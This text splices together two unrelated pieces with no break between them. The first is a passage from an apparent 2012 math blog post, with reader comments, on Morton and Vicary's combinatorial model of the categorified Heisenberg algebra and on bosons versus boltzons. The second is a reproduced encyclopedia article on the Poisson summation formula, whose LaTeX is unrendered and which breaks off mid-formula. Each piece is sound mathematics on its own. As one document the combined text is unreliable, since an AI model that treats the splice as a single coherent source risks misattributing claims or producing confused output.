a^\dagger a \Rightarrow a a^\dagger$ and $g: 1 \Rightarrow a a^\dagger$ The thing I’m calling $f: a^\dagger a \Rightarrow a a^\dagger$ says how every way to annihilate a ball (say the ball $x$) and then create a different one (say $y \ne x$) gives a way to create one (namely $y$) and then annihilate one (namely $x$). The thing I’m calling $g: 1 \Rightarrow a a^\dagger$ says how there is one other way to create a ball and then annihilate one: namely, by annihilating the same ball we just created! The five equations shown in the picture above are then a clever graphical way of describing basic facts about the morphisms $f$ and $g$ and two others which are a bit subtler to describe. These others, which deserve to be called $f^\dagger: a a^\dagger \Rightarrow a^\dagger a$ and $g^\dagger : a a^\dagger \Rightarrow 1$ do not give functions that send one way to do things to another. Instead, they give relations. You can’t ‘turn around’ a function and get a function going the other way unless it’s invertible. But you can turn around a function and get a relation going the other way. I’ve hit the limit on what I can explain without getting more serious and ruining the light-hearted, easy-going tone of this post. If you want details, I’d rather just let you read the paper! But I’d like to say a few fancier things, just for the experts. In reality, what matters most for Jeffrey and Jamie are not sets and relations, but groupoids and spans of groupoids. Spans of groupoids allow you to ‘turn around’ a functor between groupoids. In our old work on categorifying quantum mechanics, Jeffrey and I used the bicategory of • groupoids, • spans of groupoids, • isomorphism classes of maps of spans of groupoids. Recently Alex Hoffnung has shown this is a monoidal bicategory—in fact part of a monoidal tricategory if you don’t wimp out and take isomorphism classes at the 2-morphism level, as I just did. (Alex, to his credit, did not.) Mike Stay has gone further and shown it’s a compact closed symmetric monoidal bicategory. As I said, spans of groupoids let you ‘turn around’ a functor between groupoids, like $h: X \to Y$ and get something going the other way, which we denote with a dagger: $h^\dagger : Y \to X$ This is how we construct the annihilation operator $a^\dagger$ starting from the creation operator $a$ in categorified quantum mechanics. But to define 2-morphisms like $f^\dagger$ and $g^\dagger$ above, Jeffrey and Jamie need to turn around maps of spans of groupoids. And to do this, we need spans of spans of groupoids. So they need a monoidal bicategory like this: • groupoids, • spans of groupoids, • isomorphism classes of spans of spans of groupoids. They show that the equations in Khovanov’s categorified Heisenberg algebra follow from equations between 2-morphisms here… which have nice combinatorial interpretations in terms of balls in boxes! It would be interesting to see what happens if we go even further. We don’t really need to stop at spans of spans. We could keep on going forever, as noted in the famous Monte Python song: Span, span, span, span, span, span, span, span… If we went one notch further we could categorify our categorified Heisenberg algebra and get a 2-categorified Heisenberg algebra. We would find that the equations relating $f, g, f^\dagger$ and $g^\dagger$ became isomorphisms, and we could work out what equations those isomorphisms and their daggers satisfy! The important thing is this: those equations are not something we get to choose, or make up. They are what they are, and they’re just sitting there waiting for us to discover them. It could be that these higher equations are trivial for some reason. That would be interesting: it would mean that Khovanov’s categorified Heisenberg algebra is the end of the story, not the tip of an even deeper iceberg. Or, maybe these equations are nontrivial! That would be even more interesting! Of course, there’s also a lot to think about without categorifying further. What if any physical meaning do the relations in the categorified Heisenberg algebra have? Can we actually do something like physics with some categorified version of quantum theory? Or is this stuff mainly good for understanding the representation of symmetric groups in a deeper way, using combinatorics? That would already be very interesting. And so on… Posted at July 10, 2012 9:16 AM UTC TrackBack URL for this Entry:   http://golem.ph.utexas.edu/cgi-bin/MT-3.0/dxy-tb.fcgi/2540 ### Re: Morton and Vicary on the Categorified Heisenberg Algebra One comment I’d like to add is that what we have here is, as our title implies, a combinatorial “representation” of Khovanov’s categorification. That is, we have a functor from the monoidal category $H$ whose morphisms are those diagrams (which we think of as a 2-category with one object) into the 2-category $Span(Gpd)$, where the one object is taken to the groupoid of finite sets and bijections. Since the morphisms of $Span(Gpd)$ aren’t functors or maps, it’s not exactly what people often mean by a “categorified representation”, which would be an action on a category in terms of functors and natural transformations. We do talk about how to get one of these on a 2-vector space out of our groupoidal representation toward the end. So in some sense, Khovanov’s category of diagrams is a universal theory of what a categorification of the Heisenberg algebra must look like, and the combinatorial representation is a particular model of that theory. It’s one which happens to have a nice combinatorial story in which the relations John quoted are easy to see. Posted by: Jeffrey Morton on July 10, 2012 2:48 PM | Permalink | Reply to this ### Heisenberg Lie 2-algebra 1. The ordinary Heisenberg algebra is a Lie algebra, which is a sub-Lie algebra of the corresponding Poisson bracket Lie algebra. 2. The usual higher analog of a Lie algebra is a Lie 2-algebra. A Poisson bracket Lie 2-algebra has been introduced by Chris Rogers. I regard his work, as well as the considerations in the other thread, as robust evidence that this is a natural definition in 2-dimensional quantum field theory. 3. Inside the Poisson bracket Lie $2$-algebra sits the Heisenberg Lie 2-algebra. And generally, inside any Poisson-bracket Lie $n$-algebra over an $n$-plectic vector space sits the corresponding Heisenberg Lie $n$-algebra. So the evident question is: 1. Can you extract a Lie 2-algebra from the Heisenberg 2-algebra that you consider? 2. How might it be related to Chris Rogers’ Heisenberg Lie 2-algebra? Posted by: Urs Schreiber on July 10, 2012 4:45 PM | Permalink | Reply to this ### Re: Heisenberg Lie 2-algebra I don’t have much to say about Urs’ question, though I understand why it’s interesting. I hope Jamie or Jeffrey gives it a try! Just two points: • The categorified Heisenberg algebras I’m talking about can be constructed starting just from a symplectic vector space $(V,\omega)$ together with a basis obeying the canonical relations $\omega(p_i, p_j) = \omega(q_i, q_j) = 0$ $\omega(p_i, q_j) = \delta_{ij}$ There is no 2-plectic structure involved, as far as I can see. • Khovanov’s categorified Heisenberg algebra has its underlying 2-vector space a Kapranov–Voevodsky 2-vector space, while the Lie 2-algebras you’re talking about have as their underlying 2-vector space a Baez–Crans 2-vector space. Morton and Vicary’s categorified Heisenberg algebra has as its underlying ‘2-vector space’ a groupoid-–simply the groupoid of finite sets! A key step in their reasoning is a 2-functor that turns groupoids into Kapranov–Voevodsky 2-vector spaces. They call this ‘2-linearization’. It turns out to send the groupoid of finite sets to the Kapranov–Voevodksy 2-vector space that has one basis element for each Young diagram. These make it seem hard to find a nice relation between Chris Rogers’ Heisenberg Lie 2-algebra and the categorified Heisenberg algebras of Khovanov and Morton–Vicary. Besides, I think of the first as ‘dimension-boosting’, going from point particles to strings, and the second as ‘peering more deeply into the combinatorial heart’ of quantum mechanics for point particles. They don’t seem to be moving in the same direction. I suppose one could try to combine them! It’s not a very profound approach to mathematics, taking two ideas whose relation one doesn’t understand and trying to combine them. But… Maybe we could get some clues. Has Khovanov invented a ‘categorified Virasoro algebra’ yet, or categorified other famous algebras associated to string theory? I can easily imagine him giving it a try. In fact, I bet he or his followers have categorified universal enveloping algebras of affine Lie algebras, and their $q$-deformations. Posted by: John Baez on July 10, 2012 6:00 PM | Permalink | Reply to this ### Re: Heisenberg Lie 2-algebra I also can’t answer Urs’ question at the moment, though I would like to understand more about $n$-plectic structures and the other ingredients thereof. But certainly, the later part of our paper really uses that that the 2-vector space we eventually get is a KV 2-vector space, not a BC 2-vector space. Khovanov’s construction doesn’t explicitly talk about a KV 2-v.s. it acts on, because it’s mostly doing the categorified version of describing the algebra rather than a particular representation. There is some material that uses a particular representation in a category he calls $S$, where the objects of the categorified algebra are represented by bimodules and diagrams by particular bimodule maps. That’s basically equivalent to the KV 2-v.s. we get by 2-linearization, since the bimodules are all associated to the induction/restriction functors that we get for our spans. However, I can imagine there’s some sort of analogous “2-linearization” that gives a BC 2-v.s. for any groupoid, or at least discrete, locally finite ones such as we have here: linearizing the sets of objects and morphisms (in the covariant way) would be an obvious guess. Whether this gets anywhere toward the question, I’m not sure. As for categorifying these other algebras - there’s a really big literature on this, but for example there’s Rouquier’s paper which describes how to categorify the Kac-Moody algebras associated to a given Cartan datum… And lots of other work, likewise pretty general, and typically done in the q-deformed setting. Our approach links one corner of this world to groupoidification, but we don’t talk about the q-deformed versions. (I think this can probably be done, somewhat along the lines of the groupoidification of the Hecke algebra, but it’s not in our paper). I guess I would also point out that our combinatorial interpretation - the groupoid picture - gives a model of Khovanov’s $H'$, but one needs to go to the 2-linearized setting to get all the various subobjects he mentions in $H = Kar(H')$, the Karoubi envelope. We do this a bit briefly, because it gets away from the combinatorics, and there’s not a lot more to say than what was already in Khovanov’s work. What $H$ categorifies would seem to also go by the name “Heisenberg Vertex Algebra”, which is bigger than just the usual Heisenberg algebra. So this is already touching on categorifying at least a simple vertex algebra… Posted by: Jeffrey Morton on July 11, 2012 1:18 PM | Permalink | Reply to this ### Re: Heisenberg Lie 2-algebra there’s a really big literature on this, but for example there’s Rouquier’s paper which describes how to categorify the Kac-Moody algebras I have collected some references at quantum affine algebra. What H categorifies would seem to also go by the name “Heisenberg Vertex Algebra”, Hm, so $H$ is as in your article? You are saying it categorifies a vertex algebra after all? Or what do you mean? Posted by: Urs Schreiber on July 13, 2012 3:45 AM | Permalink | Reply to this ### (k,n)-vector spaces A comment on the notion of higher vector spaces: the KV definition is not really on par with the BC definition: • the KV notion is a very restricted notion of (2,2)-vector spaces, • the BC notion is the general notion of (2,1)-vector space (both over the given ground field $k$). The general situation is this: • pick some commutative $\infty$-ring $k$ (can be modeled by an $E_\infty$-ring); • write $Mod_k$ for the $(\infty,1)$-category of $\infty$-modules over $k$ (can be modeled by $E_\infty$-modules); the objects in here are “$(\infty,1)$-vector spaces” over $k$; • write $2 Mod_k$ for the $(\infty,2)$-category whose • objects are algebra objects $A$ in $Mod_k$ (to be thought of as placeholders for their $(\infty,1)$-category $Mod_A$ of modules); • morphisms are bimodule objects $N$ in $Mod_k$ (to be thought of as placeholders for $k$-linear functors $(-) \otimes_A N : Mod_A \to Mod_B$); • generally for $n \gt 1$, by induction, write $n Mod_k$ for the $(\infty,n)$-category whose • objects are algebra objects $A$ in $(n-1)Mod_k$; • morphisms are bimodule objects in $(n-1)Mod_k$; In this general pattern, the cases discussed here are the following: • the ground $\infty$-ring $k$ is an ordinary field. • $Mod_k$ is the $(\infty,1)$-category of chain complexes of $k$-modules. A general element in here is a $(\infty,1)$-vector space over $k$. In particular a BC-vector space is a 1-truncated such object, hence a $(2,1)$-vector space. • $2 Mod_k$ is the $(\infty,2)$-category whose objects are given by dg-algebras, and whose morphisms are given by dg-bimodules. • consider the ordinary algebras $k^{\oplus n}$, regarded trivially as a dg-algebra. The corresponding object in $2 Mod_k$ is the KV-2-vector space of dimension $n$. nLab: (∞,n)-vector space Posted by: Urs Schreiber on July 11, 2012 5:45 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Typo: “the position operator is called a” – should be “annihilation operator” Posted by: Stuart Presnell on July 10, 2012 7:30 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Oh, and presumably “Monte Python” is a uniform random sampling from a population of snakes? Posted by: Stuart Presnell on July 10, 2012 7:40 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Thanks, I’ll fix that typo. Did you know that as you increase the size of a random sample until it converges to the actual distribution its chosen from, you get the ‘full Monte’? Posted by: John Baez on July 11, 2012 3:42 AM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra “funny facts about quantum mechanics are related to simple facts about balls in boxes” While it’s clearly true that the same mathematical relation holds between the two pairs of operations, how seriously can we take this analogy physically? I mean, the relation only holds for macroscopic objects because they’re distinguishable. That’s the only sense in which there are 4 (distinct) ways to remove a ball from a box with 4 balls in. If the objects were indistinguishable (by which I suppose I mean: if they’re not to be counted as distinct entities each with their own identity) then this wouldn’t work. So for example, if you have 4 $10 bills in your wallet, then there are 4 distinct ways to remove one, because each bill is an individual entity with its own distinguishing characteristics. But the dollars in your bank account are fungible, so if you have$40 in your account there aren’t 4 distinct ways to withdraw $10 from it to reduce it to$30. In short: the “ways to remove a thing” are only as distinct as the “things” themselves! [Side note: we might also consider intermediate cases in which the symmetry on the objects is something between “all are distinct” and “all are interchangeable”. Then presumably the relation between (remove add) and (add remove) depends in a more complicated way on the symmetry acting on the things.] But the creation and annihilation operators for quanta do satisfy the above relation, which seems to suggest that quanta behave more like dollar bills than bank-account dollars – i.e. that they have their own identities, rather than being fungible. But that’s really weird, and exactly opposite to what I’d expect! So what’s going on here? Is it just a misleading coincidence that the same mathematical relation holds for the creation and annihiliation operators as holds for balls and dollar bills? Or does this relation tell us that quanta of energy should be thought of – quite counter-intuitively – as having distinct identities? Posted by: Stuart Presnell on July 10, 2012 8:53 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra You may be just discussing the difference between Fermi-Dirac statistics which apply to distinguishable fermions and Bose-Einstein statistics which apply to indistinguishable bosons. Posted by: RodMcGuire on July 10, 2012 10:34 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra Actually Stuart is discussing the difference between Bose–Einstein statistics and Maxwell–Boltzmann statistics. Bose–Einstein statistics apply to bosons: indistinguishable particles that transform according to the trivial representation of the symmetric group $S_n$ on $S^n H$, the $n$th symmetric tensor power of the single-particle Hilbert space $H$. Maxwell–Boltzmann statistics apply to boltzons: distinguishable particles, which transform according to the permutation representation of $S_n$ on $H^{\otimes n}$, the $n$th tensor power of $H$. People don’t talk about boltzons very much because we don’t know any particles that act exactly like boltzons when we take quantum mechanics into account. But in certain ‘classical limits’ Maxwell–Boltzmann statistics work well. For classical balls in a box, they’re just right. To answer Stuart: I understand your puzzlement! I was completely shocked when I realized that we can use the mathematics of Fock space, including the commutation relations $a a^\dagger - a^\dagger a = 1$ for boltzons as well as bosons. The big difference is that we normalize states a different way, because the states describe probability distributions rather than wavefunctions. This is what I’ve been working on for the last year, and I’m writing a little book on it with Jacob Biamonte, tentatively called Quantum Techniques for Stochastic Processes. Posted by: John Baez on July 11, 2012 3:58 AM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra I agree this is weird. The sense I have, after playing with this for a few years on and off, is that this analogy isn’t physically meaningless, but it’s not obvious how literally to take it. So it might possibly make this clearer to understand that not only do the commutation relations for balls-in-boxes and for the harmonic oscillator look similar formally, they arise for very similar reasons. This isn’t in our current paper, by the way, but it will be an important part of the second installment, tentatively subtitled “Models on Free Structures”, and is mentioned briefly in this talk I gave at the Higher Structures workshop last year. It’s also the part of this project which really uses the formal analysis of the harmonic oscillator which Jamie Vicary did in the paper John linked to above, A categorical framework for the quantum harmonic oscillator. So, to recap how one gets the Fock space for the harmonic oscillator… Start with the Hilbert space for a particle with no particular features - namely just $\mathbb{C}$. There is only one state here, in the sense of a ray in the Hilbert space, so this system is a “particle” of which the only thing to say about it is that it’s there. The bosonic Fock space is then $\oplus_n \mathbb{C}^{\otimes_s n}$, the direct sum of all symmetric tensor products of some number of copies of this space. One way to say this is that the symmetric tensor product of a space $V$ with itself is the equalizer of two maps $V \otimes V \rightarrow V \otimes V$, namely the identity and the swap map. Likewise, $V^{\otimes_s n}$ is the equalizer of all the permutation automorphisms that appear because $V^{\otimes n}$ is automatically a representation of $S_n$. So the symmetric product is the trivial representation. Since $\mathbb{C}^{\otimes_s n} \cong \mathbb{C}$, this is just a sum of a bunch of 1-dimensional spaces, each of which describes an $n$-particle system, which again has only one state. The only thing to say about this state is that it has $n$ particles in it. Jamie’s original paper explains this by means of a monad on $Hilb$, which is essentially the “free commutative monoid” monad: the Fock space is the free commutative monoid on $\mathbb{C}$. This fact gives a bunch of special maps, including a bialgebra structure on the Fock space, and the raising and lowering operators can be constructed out of this. The commutation relations are a consequence of that. Now, groupoidifying this is a categorification, so this description has to be weakened. To start with, we take a groupoid describing a system with only one configuration (the “it’s there” state for our particle). This will be the trivial groupoid $\mathbf{1}$, with one object and only the identity morphism. Then we want to take the “groupoidified Fock space”. Since groupoids live in a 2-category, the equivalent of the “free commutative monoid” monad turns out to be a bit weaker, namely the “free symmetric monoidal category” 2-monad. We get a “direct sum” (i.e. in $Span(Gpd)$, the disjoint union) of a bunch of objects which show up as certain 2-limits. In particular, we freely generate a bunch of objects like $(\mathbb{1} \otimes ... \otimes \mathbb{1})$, and we must get not EQUATIONS, but ISOMORPHISMS corresponding to all the switch maps. This is essentially where the groupoid of finite sets and bijections come from: think of $\mathbb{1}$ as the groupoid which contains exactly the 1-element set - the free symmetric monoidal category this generates is the groupoid which contains all finite sets and their bijections. All the structure which appeared in the construction of Fock space also appears here - and the things which correspond to raising and lowering operators are exactly what we intuitively describe as “put a ball in” and “take a ball out” (i.e. functors which add or remove elements of any given set). The categorified commutation relations then hold for the same sort of reasons as before. The picture in $Hilb$ is then related to the picture in $Span(Gpd)$ by the degroupoidification functor, which gets along with all the structures involved. The fact that degroupoidification assigns a vector space to a groupoid which consists of invariant functions on the groupoid necessarily means that it produces the trivial representation of all those symmetric groups. One could probably get a fermionic Fock space by forcibly turning the groupoid of finite sets into a super-groupoid, where the odd permutations have a negative sign, and changing the degroupoidification functor accordingly. In fact, the 2-vector space which we assign to the groupoid actually consists of all representations - so in some sense the weakening of the symmetry in the construction of Fock space makes it indeterminate what statistics the particles have. The bosonic representations are all in there, though. (Note also that there’s no reason that we have to start with the trivial groupoid for this process to make sense - it’s just the choice that gives the harmonic oscillator and the Heisenberg algebra we’re looking for. The end result will then involve also the representation theory of whatever groupoid one starts with, as well as the symmetric groups.) So the fact that this all works is not merely a coincidence - but this sort of formal description obviously can’t settle whether or not the non-coincidence is also physically relevant. Short version: yes, that’s weird. I don’t know how seriously to take it. Posted by: Jeffrey Morton on July 11, 2012 2:07 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra I guess, to relate the above to what John said: turning “Bosons” into “Boltzons” is what we should expect from a categorification, which weakens equations to isomorphisms. Turning “Boltzons” into “Bosons” is a particular property of degroupoidification. So I would look at that part to see if there’s actually physical significance to this stuff. Is there anything about how we set about observing physical systems which explains this property of degroupoidification? Posted by: Jeffrey Morton on July 11, 2012 2:13 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra I don’t know exactly why, but putting the words “observation” and “degroupoidification” in the same sentence feels right. Posted by: Eric on July 11, 2012 3:18 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra This is very nice! I have always been unsatisfied by the way quantum group theorists go about “categorifying” things by just writing down a bunch of generators and relations in picture form. So it’s great to see how a natural categorification arises from simple combinatorics, and factors the generators-and-relations categorification by way of string diagram calculus. I look forward to hearing how the $q$-deformed version goes! Posted by: Mike Shulman on July 12, 2012 9:25 PM | Permalink | Reply to this ### Re: Morton and Vicary on the Categorified Heisenberg Algebra What do you do if your quantum system has finite Hilbert-space dimension? In the combinatorial picture discussed here, we can always drop another marble into the bag: we can keep applying the creation operator $a^\dag$ as many times as we like. Whether we get probabilities for bosons or boltzons in the end, we can have an arbitrary large number of them. But what if there’s a ceiling on the occupation number? I’ve seen people who try to do stochastic mechanics with bounded occupation numbers go about it in a couple different ways. One is to put in something like an exponential decay factor, so that while in principle the occupation number (the number of fish living in a pond, for example) could grow bigger and bigger, the probability of its doing so drops off, so populations sizes beyond some “carrying capacity” aren’t likely enough to worry about. Here’s an example: • U. C. Täuber (2012), “Population oscillations in spatial stochastic Lotka–Volterra models: A field-theoretic perturbational analysis” arXiv:1206.2303 [cond-mat.stat-mech]. Another way is to use anticommuting spin operators instead. An example which I just saw today (and which brought this line of thought to mind) is the following: • F. Bagarello and F. Oliveri (2012), “A phenomenological operator description of interactions between populations with applications to migration” arXiv:1207.2873 [physics.bio-ph]. Is there something like a stuff operator whose decategorification is a Pauli operator $\sigma_i$? Or, more generally, a displacement operator in the Weyl–Heisenberg group for dimension $d$? (For some values of $d$ at least, there are interesting geometrical pictures for the Weyl–Heisenberg group: for example, applying the group elements to a “fiducial vector” in Hilbert space produces a set of states which is analogous to a dual affine plane of order $d$.) Posted by: Blake Stacey on July 13, 2012 3:29 AM | Permalink | Reply to this Post a New Comment
#jsDisabledContent { display:none; } My Account |  Register |  Help # Poisson summation formula Article Id: WHEBN0000502042 Reproduction Date: Title: Poisson summation formula Author: World Heritage Encyclopedia Language: English Subject: Collection: Publisher: World Heritage Encyclopedia Publication Date: ### Poisson summation formula In mathematics, the Poisson summation formula is an equation that relates the Fourier series coefficients of the periodic summation of a function to values of the function's continuous Fourier transform. Consequently, the periodic summation of a function is completely defined by discrete samples of the original function's Fourier transform. And conversely, the periodic summation of a function's Fourier transform is completely defined by discrete samples of the original function. The Poisson summation formula was discovered by Siméon Denis Poisson and is sometimes called Poisson resummation. ## Contents • Forms of the equation 1 • Distributional formulation 2 • Derivation 3 • Applicability 4 • Applications 5 • Method of images 5.1 • Sampling 5.2 • Ewald summation 5.3 • Lattice points in a sphere 5.4 • Number theory 5.5 • Generalizations 6 • Selberg trace formula 6.1 • Notes 8 • References 9 ## Forms of the equation For appropriate functions f,\,  the Poisson summation formula may be stated as: \sum_{n=-\infty}^\infty f(n)=\sum_{k=-\infty}^\infty \hat f\left(k\right),     where \hat f  is the Fourier transform[note 1] of f\,;  that is   \hat f(\nu) = \mathcal{F}\{f(x)\}. (Eq.1) With the substitution, g(xP)\ \stackrel{\text{def}}{=}\ f(x),\,  and the Fourier transform property,  \mathcal{F}\{g(x P)\}\ = \frac{1}{P} \cdot \hat g\left(\frac{\nu}{P}\right)  (for P > 0),  Eq.1 becomes: \sum_{n=-\infty}^\infty g(nP)=\frac{1}{P}\sum_{k=-\infty}^\infty \hat g\left(\frac{k}{P}\right)     (Stein & Weiss 1971). (Eq.2) With another definition,  s(t+x)\ \stackrel{\text{def}}{=}\ g(x),\,  and the transform property  \mathcal{F}\{s(t+x)\}\ = \hat s(\nu)\cdot e^{i 2\pi \nu t},  Eq.2 becomes a periodic summation (with period P) and its equivalent Fourier series: \underbrace{\sum_{n=-\infty}^{\infty} s(t + nP)}_{S_P(t)} = \sum_{k=-\infty}^{\infty} \underbrace{\frac{1}{P}\cdot \hat s\left(\frac{k}{P}\right)}_{S[k]}\ e^{i 2\pi \frac{k}{P} t }     (Pinsky 2002; Zygmund 1968). (Eq.3) Similarly, the periodic summation of a function's Fourier transform has this Fourier series equivalent: \sum_{k=-\infty}^{\infty} \hat s(\nu + k/T) = \sum_{n=-\infty}^{\infty} T\cdot s(nT)\ e^{-i 2\pi n T \nu} \equiv \mathcal{F}\left \{ \sum_{n=-\infty}^{\infty} T\cdot s(nT)\ \delta(t-nT)\right \}, (Eq.4) where T represents the time interval at which a function s(t) is sampled, and 1/T is the rate of samples/sec. ## Distributional formulation These equations can be interpreted in the language of distributions (Córdoba 1988; Hörmander 1983, §7.2) for a function f whose derivatives are all rapidly decreasing (see Schwartz function). Using the Dirac comb distribution and its Fourier series: \sum_{n=-\infty}^\infty \delta(x-nT) \equiv \sum_{k=-\infty}^\infty \frac{1}{T}\cdot e^{-i 2\pi \frac{k}{T} x} \quad\stackrel{\mathcal{F}}{\Longleftrightarrow}\quad \frac{1}{T}\cdot \sum_{k=-\infty}^{\infty} \delta (\nu+k/T), (Eq.7) In other words, the periodization of a Dirac delta \delta, resulting in a Dirac comb, corresponds to the discretization of its spectrum which is constantly one. Hence, this again is a Dirac comb but with reciprocal increments. \begin{align} \sum_{k=-\infty}^\infty \hat f(k) &= \sum_{k=-\infty}^\infty \left(\int_{-\infty}^{\infty} f(x)\ e^{-i 2\pi k x} dx \right) = \int_{-\infty}^{\infty} f(x) \underbrace{\left(\sum_{k=-\infty}^\infty e^{-i 2\pi k x}\right)}_{\sum_{n=-\infty}^\infty \delta(x-n)} dx \\ &= \sum_{n=-\infty}^\infty \left(\int_{-\infty}^{\infty} f(x)\ \delta(x-n)\ dx \right) = \sum_{n=-\infty}^\infty f(n). \end{align} Similarly: \begin{align} \sum_{k=-\infty}^{\infty} \hat s(\nu + k/T) &= \sum_{k=-\infty}^{\infty} \mathcal{F}\left \{ s(t)\cdot e^{-i 2\pi\frac{k}{T}t}\right \}\\ &= \mathcal{F} \bigg \{s(t)\underbrace{\sum_{k=-\infty}^{\infty} e^{-i 2\pi\frac{k}{T}t}}_{T \sum_{n=-\infty}^{\infty} \delta(t-nT)}\bigg \} = \mathcal{F}\left \{\sum_{n=-\infty}^{\infty} T\cdot s(nT) \cdot \delta(t-nT)\right \}\\ &= \sum_{n=-\infty}^{\infty} T\cdot s(nT) \cdot \mathcal{F}\left \{\delta(t-nT)\right \} = \sum_{n=-\infty}^{\infty} T\cdot s(nT) \cdot e^{-i 2\pi nT \nu}. \end{align} ## Derivation We can also prove that Eq.3 holds in the sense that if s(t)  ∈ L1(R), then the right-hand side is the (possibly divergent) Fourier series of the left-hand side. This proof may be found in either (Pinsky 2002) or (Zygmund 1968). It follows from the dominated convergence theorem that sP(t) exists and is finite for almost every t. And furthermore it follows that sP is integrable on the interval [0,P]. The right-hand side of Eq.3 has the form of a Fourier series. So it is sufficient to show that the Fourier series coefficients of sP(t) are \scriptstyle \frac{1}{P} \hat s\left(\frac{k}{P}\right).. Proceeding from the definition of the Fourier coefficients we have: \begin{align} S[k]\ &\stackrel{\text{def}}{=}\ \frac{1}{P}\int_0^{P} s_P(t)\cdot e^{-i 2\pi \frac{k}{P} t}\, dt\\ &=\ \frac{1}{P}\int_0^{P} \left(\sum_{n=-\infty}^{\infty} s(t + nP)\right) \cdot e^{-i 2\pi\frac{k}{P} t}\, dt\\ &=\ \frac{1}{P} \sum_{n=-\infty}^{\infty} \int_0^{P} s(t + nP)\cdot e^{-i 2\pi\frac{k}{P} t}\, dt, \end{align} where the interchange of summation with integration is once again justified by dominated convergence. With a change of variables (τ = t + nP) this becomes: \begin{align} S[k] = \frac{1}{P} \sum_{n=-\infty}^{\infty} \int_{nP}^{nP + P} s(\tau) \ e^{-i 2\pi \frac{k}{P} \tau} \ \underbrace{e^{i 2\pi k n}}_{1}\,d\tau \ =\ \frac{1}{P} \int_{-\infty}^{\infty} s(\tau) \ e^{-i 2\pi \frac{k}{P} \tau} d\tau = \frac{1}{P}\cdot \hat s\left(\frac{k}{P}\right) \end{align}       QED. ## Applicability Eq.3 holds provided s(t) is a continuous integrable function which satisfies |s(t)| + |\hat{s}(t)| \le C (1+|t|)^{-1-\delta} for some C, δ > 0 and every t (Grafakos 2004; Stein & Weiss 1971). Note that such s(t) is uniformly continuous, this together with the decay assumption on s, show that the series defining sP converges uniformly to a continuous function.   Eq.3 holds in the strong sense that both sides converge uniformly and absolutely to the same limit (Stein & Weiss 1971). Eq.3 holds in a pointwise sense under the strictly weaker assumption that s has bounded variation and 2\cdot s(t)=\lim_{\varepsilon\to 0} s(t+\varepsilon) + \lim_{\varepsilon\to 0} s(t-\varepsilon)     (Zygmund 1968). The Fourier series on the right-hand side of Eq.3 is then understood as a (conditionally convergent) limit of symmetric partial sums. As shown above, Eq.3 holds under the much less restrictive assumption that s(t) is in L1(R), but then it is necessary to interpret it in the sense that the right-hand side is the (possibly divergent) Fourier series of sP(t) (Zygmund 1968). In this case, one may extend the region where equality holds by considering summability methods such as Cesàro summability. When interpreting convergence in this way Eq.2 holds under the less restrictive conditions that g(x) is integrable and 0 is a point of continuity of gP(x). However Eq.2 may fail to hold even when both g\, and \hat{g} are integrable and continuous, and the sums converge absolutely (Katznelson 1976). ## Applications ### Method of images In partial differential equations, the Poisson summation formula provides a rigorous justification for the fundamental solution of the heat equation with absorbing rectangular boundary by the method of images. Here the heat kernel on R2 is known, and that of a rectangle is determined by taking the periodization. The Poisson summation formula similarly provides a connection between Fourier analysis on Euclidean spaces and on the tori of the corresponding dimensions (Grafakos 2004). In one dimension, the resulting solution is called a theta function. ### Sampling In the statistical study of time-series, if f is a function of time, then looking only at its values at equally spaced points of time is called "sampling." In applications, typically the function f is band-limited, meaning that there is some cutoff frequency f_o such that the Fourier transform is zero for frequencies exceeding the cutoff: \hat{f}(\xi)=0 for |\xi|>f_o. For band-limited functions, choosing the sampling rate 2f_o guarantees that no information is lost: since \hat f can be reconstructed from these sampled values, then, by Fourier inversion, so can f. This leads to the Nyquist–Shannon sampling theorem (Pinsky 2002). ### Ewald summation Computationally, the Poisson summation formula is useful since a slowly converging summation in real space is guaranteed to be converted into a quickly converging equivalent summation in Fourier space. (A broad function in real space becomes a narrow function in Fourier space and vice versa.) This is the essential idea behind Ewald summation. ### Lattice points in a sphere The Poisson summation formula may be used to derive Landau's asymptotic formula for the number of lattice points in a large Euclidean sphere. It can also be used to show that if an integrable function, f\, and \hat f both have compact support then f = 0\,  (Pinsky 2002). ### Number theory In number theory, Poisson summation can also be used to derive a variety of functional equations including the functional equation for the Riemann zeta function.[1] One important such use of Poisson summation concerns theta functions: periodic summations of Gaussians . Put q= e^{i\pi \tau } , for \tau a complex number in the upper half plane, and define the theta function: \theta ( \tau) = \sum_n q^{n^2}. The relation between \theta (-1/\tau) and \theta (\tau) turns out to be important for number theory, since this kind of relation is one of the defining properties of a modular form. By choosing f= e^{-\pi x^2} in the second version of the Poisson summation formula (with a = 0), and using the fact that \hat f = e^{-\pi \xi ^2} , one gets immediately \theta \left({-1\over\tau}\right) = \sqrt{ \tau \over i} \theta (\tau) by putting {1/\lambda} = \sqrt{ \tau/i} . It follows from this that \theta^8 has a simple transformation property under \tau \mapsto {-1/ \tau} and this can be used to prove Jacobi's formula for the number of different ways to express an integer as the sum of eight perfect squares. ## Generalizations The Poisson summation formula holds in Euclidean space of arbitrary dimension. Let Λ be the lattice in Rd consisting of points with integer coordinates; Λ is the character group, or Pontryagin dual, of Rd. For a function ƒ in L1(Rd), consider the series given by summing the translates of ƒ by elements of Λ: \sum_{\nu\in\Lambda} f(x+\nu). Theorem For ƒ in L1(Rd), the above series converges pointwise almost everywhere, and thus defines a periodic function Pƒ on Λ. Pƒ lies in L1(Λ) with ||Pƒ||1 ≤ ||ƒ||1. Moreover, for all ν in Λ, Pƒ̂(ν) (Fourier transform on Λ) equals ƒ̂(ν) (Fourier transform on Rd). When ƒ is in addition continuous, and both ƒ and ƒ̂ decay sufficiently fast at infinity, then one can "invert" the domain back to Rd and make a stronger statement. More precisely, if |f(x)| + |\hat{f}(x)| \le C (1+|x|)^{-d-\delta} for some C, δ > 0, then \sum_{\nu\in\Lambda} f(x+\nu) = 